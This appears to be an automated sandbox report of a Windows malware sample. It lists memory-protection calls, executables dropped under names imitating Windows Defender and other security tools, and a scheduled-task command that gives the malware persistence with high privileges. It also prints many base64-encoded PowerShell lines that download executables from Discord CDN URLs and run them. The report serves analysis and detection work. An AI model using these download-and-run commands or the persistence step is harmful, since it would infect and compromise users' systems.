NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2884 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e70000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72461000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72462000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2884 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 8, 2022, 9:35 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02727000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (14 events)

file	C:\Users\test22\AppData\Roaming\FILEMANAGE.EXE
file	C:\Users\test22\AppData\Roaming\REDLINESECURITY.EXE
file	C:\Users\test22\AppData\Roaming\DEFENDERRUNTIMEE.EXE
file	C:\Users\test22\AppData\Roaming\SECURITYHEALTHSERVICE.EXE
file	C:\Users\test22\AppData\Roaming\WINDOWSDEFENDERSMART.EXE
file	C:\Users\test22\AppData\Roaming\SECURITYHEALTHSEURVIC.EXE
file	C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe
file	C:\Users\test22\AppData\Roaming\REDLINESECURTY.EXE
file	C:\Users\test22\AppData\Roaming\DEFENDERRUNTIME.EXE
file	C:\Users\test22\AppData\Roaming\SECURITYHOST.EXE
file	C:\Users\test22\AppData\Roaming\FILEMANAGER.EXE
file	C:\Users\test22\AppData\Roaming\WINDOWSHELLHOSTT.EXE
file	C:\Users\test22\AppData\Roaming\S500UBNAN.EXE
file	C:\Users\test22\AppData\Roaming\WINDOWSPROTECT.EXE

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (27 events)

cmdline	powershell -EncodedCommand "PAAjAGcAawBmACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA3ADkAOAA1ADcAMQA4ADYANAAxADMANAAvAHUAYgBuAGEAbgAuAGUAeABlACcALAAgADwAIwBzAGgAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAZgBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGUAegBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMANQAwADAAdQBiAG4AYQBuAC4AZQB4AGUAJwApACkAPAAjAHkAbgBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHIAdABmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB4AGwAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTADUAMAAwAHUAYgBuAGEAbgAuAGUAeABlACcAKQA8ACMAcwBoAHcAIwA+AA=="
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwBlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADMANQA5ADkANAAxADcAMgAyADEANgAyAC8AUwBlAGMAdQByAGkAdAB5AEgAbwBzAHQALgBlAHgAZQAnACwAIAA8ACMAZABnAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAHAAYwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGYAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABvAHMAdAAuAGUAeABlACcAKQApADwAIwB2AGgAdAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAGQAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcABwAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAbwBzAHQALgBlAHgAZQAnACkAPAAjAHUAYgBoACMAPgA="
cmdline	powershell -EncodedCommand "PAAjAGUAYgB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA0ADIAOQAyADUANQAwADEAMgA0ADUAMgAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAAuAGUAeABlACcALAAgADwAIwBiAGIAegAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbgBqACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAaQBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAAuAGUAeABlACcAKQApADwAIwBlAGsAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHAAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABwAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AC4AZQB4AGUAJwApADwAIwBwAGoAdgAjAD4A"
cmdline	powershell -EncodedCommand "PAAjAGwAbABiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgAxADkAMgAxADUAOQA0ADAAOAAxADcAMAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAdQByAHYAaQBjAC4AZQB4AGUAJwAsACAAPAAjAGMAdwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaAB4AGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAC4AZQB4AGUAJwApACkAPAAjAHoAaQBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAG0AaQBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAGoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMALgBlAHgAZQAnACkAPAAjAHkAeABsACMAPgA="
cmdline	schtasks /create /tn \WIndowShellHost /tr "C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAawBmACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA3ADkAOAA1ADcAMQA4ADYANAAxADMANAAvAHUAYgBuAGEAbgAuAGUAeABlACcALAAgADwAIwBzAGgAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAZgBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGUAegBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMANQAwADAAdQBiAG4AYQBuAC4AZQB4AGUAJwApACkAPAAjAHkAbgBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHIAdABmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB4AGwAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTADUAMAAwAHUAYgBuAGEAbgAuAGUAeABlACcAKQA8ACMAcwBoAHcAIwA+AA=="
cmdline	powershell -EncodedCommand "PAAjAG0AcgBzACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA4ADkANQAyADAAMAAyADUAMQA5ADkANgAvAEYAaQBsAGUATQBhAG4AYQBnAGUAcgAuAGUAeABlACcALAAgADwAIwB0AG0AdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AcgBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHYAagBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUAcgAuAGUAeABlACcAKQApADwAIwBmAHIAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAHIAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQBzAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARgBpAGwAZQBNAGEAbgBhAGcAZQByAC4AZQB4AGUAJwApADwAIwBnAHYAbAAjAD4A"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAYgB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA0ADIAOQAyADUANQAwADEAMgA0ADUAMgAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAAuAGUAeABlACcALAAgADwAIwBiAGIAegAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbgBqACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAaQBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAAuAGUAeABlACcAKQApADwAIwBlAGsAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHAAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABwAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AC4AZQB4AGUAJwApADwAIwBwAGoAdgAjAD4A"
cmdline	powershell -EncodedCommand "PAAjAGwAdwBlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADMANQA5ADkANAAxADcAMgAyADEANgAyAC8AUwBlAGMAdQByAGkAdAB5AEgAbwBzAHQALgBlAHgAZQAnACwAIAA8ACMAZABnAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAHAAYwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGYAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABvAHMAdAAuAGUAeABlACcAKQApADwAIwB2AGgAdAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAGQAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcABwAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAbwBzAHQALgBlAHgAZQAnACkAPAAjAHUAYgBoACMAPgA="
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAeQB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANQA3ADkAMwA3ADkAMgA4ADAAMgA5ADMANgAvAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAGUALgBlAHgAZQAnACwAIAA8ACMAaABhAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBrAGIAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAHAAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBEAGUAZgBlAG4AZABlAHIAUgB1AG4AdABpAG0AZQBlAC4AZQB4AGUAJwApACkAPAAjAGcAcwB0ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAcAB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAHYAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBEAGUAZgBlAG4AZABlAHIAUgB1AG4AdABpAG0AZQBlAC4AZQB4AGUAJwApADwAIwBwAG4AeAAjAD4A"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcgBzACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA4ADkANQAyADAAMAAyADUAMQA5ADkANgAvAEYAaQBsAGUATQBhAG4AYQBnAGUAcgAuAGUAeABlACcALAAgADwAIwB0AG0AdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AcgBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHYAagBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUAcgAuAGUAeABlACcAKQApADwAIwBmAHIAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAHIAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQBzAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARgBpAGwAZQBNAGEAbgBhAGcAZQByAC4AZQB4AGUAJwApADwAIwBnAHYAbAAjAD4A"
cmdline	powershell -EncodedCommand "PAAjAGsAeQB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANQA3ADkAMwA3ADkAMgA4ADAAMgA5ADMANgAvAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAGUALgBlAHgAZQAnACwAIAA8ACMAaABhAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBrAGIAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAHAAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBEAGUAZgBlAG4AZABlAHIAUgB1AG4AdABpAG0AZQBlAC4AZQB4AGUAJwApACkAPAAjAGcAcwB0ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAcAB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAHYAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBEAGUAZgBlAG4AZABlAHIAUgB1AG4AdABpAG0AZQBlAC4AZQB4AGUAJwApADwAIwBwAG4AeAAjAD4A"
cmdline	powershell -EncodedCommand "PAAjAG4AYgB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADQAOAAwADYANAA1ADMAOAA2ADMANgAxAC8AVwBpAG4AZABvAHcAcwBQAHIAbwB0AGUAYwB0AC4AZQB4AGUAJwAsACAAPAAjAGcAawBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdQBiAHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBzAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAG4AZABvAHcAcwBQAHIAbwB0AGUAYwB0AC4AZQB4AGUAJwApACkAPAAjAGIAYwBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHEAdQBrACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB5AGsAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAFAAcgBvAHQAZQBjAHQALgBlAHgAZQAnACkAPAAjAGwAbgBlACMAPgA="
